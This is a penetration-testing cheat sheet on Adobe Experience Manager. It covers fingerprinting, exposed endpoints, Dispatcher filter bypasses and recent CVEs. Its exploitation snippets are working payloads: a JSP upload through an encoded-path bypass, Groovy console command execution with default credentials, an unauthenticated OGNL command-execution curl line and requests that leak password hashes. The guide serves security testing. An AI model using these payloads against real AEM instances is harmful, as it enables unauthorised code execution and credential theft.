AEM (Adobe Experience Manager) Pentesting
{{#include ../../banners/hacktricks-training.md}}
Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).
From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.
The checklist below focuses on externally reachable (unauth) attack surface that keeps showing up in real engagements (2022-2026).
1. Fingerprinting
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
Other quick indicators:
* /etc.clientlibs/ static path present (returns JS/CSS).
/libs/granite/core/content/login.html login page with the βAdobe Experience Managerβ banner.
</script> comment at the bottom of HTML.
2. High-value unauthenticated endpoints
| Path | What you get | Notes |
|---|---|---|
/.json, /.1.json |
JCR nodes via DefaultGetServlet | Often blocked, but Dispatcher bypass (see below) works. |
/bin/querybuilder.json?path=/ |
QueryBuilder API | Leak of page tree, internal paths, user names. |
/system/console/status-*, /system/console/bundles |
OSGi/Felix console | 403 by default; if exposed & creds found β bundle-upload RCE. |
/crx/packmgr/index.jsp |
Package Manager | Allows authenticated content packages β JSP payload upload. |
/etc/groovyconsole/** |
AEM Groovy Console | If exposed β arbitrary Groovy / Java execution. |
/libs/cq/AuditlogSearchServlet.json |
Audit logs | Information disclosure. |
/libs/cq/ui/content/dumplibs.html |
ClientLibs dump | XSS vector. |
/adminui/debug |
AEM Forms on JEE Struts dev-mode OGNL evaluator | On misconfigured Forms installs (CVE-2025-54253) this endpoint executes unauthenticated OGNL β RCE. |
Dispatcher bypass tricks (still working in 2025/2026)
Most production sites sit behind the Dispatcher (reverse-proxy). Filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.
Classic semicolon + allowed extension
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
Encoded slash bypass (2025 KB ka-27832)
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
If the Dispatcher allows encoded slashes, this returns JSON even when
/bin is supposedly denied.
3. Common misconfigurations (still alive in 2026)
- Anonymous POST servlet β
POST /.jsonwith:operation=importlets you plant new JCR nodes. Blocking*.jsonPOST in the Dispatcher fixes it. - World-readable user profiles β default ACL grants
jcr:readon/home/users/**/profile/*to everyone. - Default credentials β
admin:admin,author:author,replication:replication. - WCMDebugFilter enabled β reflected XSS via
?debug=layout(CVE-2016-7882, still found on legacy 6.4 installs). - Groovy Console exposed β remote code execution by sending a Groovy script:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json - Dispatcher encoded-slash gap β
/bin/querybuilder.jsonand/etc/truststore.jsonreachable with%2f/%3Beven when blocked by path filters. - AEM Forms Struts devMode left enabled β
/adminui/debug?expression=evaluates OGNL without auth (CVE-2025-54253) leading to unauth RCE; paired XXE in Forms submission (CVE-2025-54254) allows file read.
4. Recent vulnerabilities (service-pack cadence)
| Quarter | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS β code execution via author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) β upgrade to 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962β¦74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code exec (low-priv). |
| Dec 2023 | APSB23-72 | β€ 6.5.18 | DOM-based XSS via crafted URL. |
Always check the APSB bulletin matching the customerβs service-pack and push for the latest 6.5.24 (Nov 26, 2025) or Cloud Service 2025.12. AEM Forms on JEE requires its own add-on hotfix 6.5.0-0108+.
5. Exploitation snippets
5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
Now request
/content/evil.jsp β the JSP runs with the AEM process user.
5.2 SSRF to RCE (historical < 6.3)
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py from aem-hacker automates the full chain.
5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
If vulnerable, the HTTP body contains the command output.
5.4 QueryBuilder hash disclosure (encoded slash bypass)
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
Returns user nodes including
rep:password hashes when anonymous read ACLs are default.
6. Tooling
- aem-hacker β Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more.
python3 aem_hacker.py -u https://target --host attacker-ip - Tenable WAS plugin 115065 β Detects QueryBuilder hash disclosure & encoded-slash bypass automatically (published Dec 2025).
- Content brute-force β recursively request
/_jcr_content.(json|html)to discover hidden components. - osgi-infect β upload malicious OSGi bundle via
/system/console/bundlesif creds available.
References
- Adobe Security Bulletin APSB25-115 β Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer β Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)
{{#include ../../banners/hacktricks-training.md}}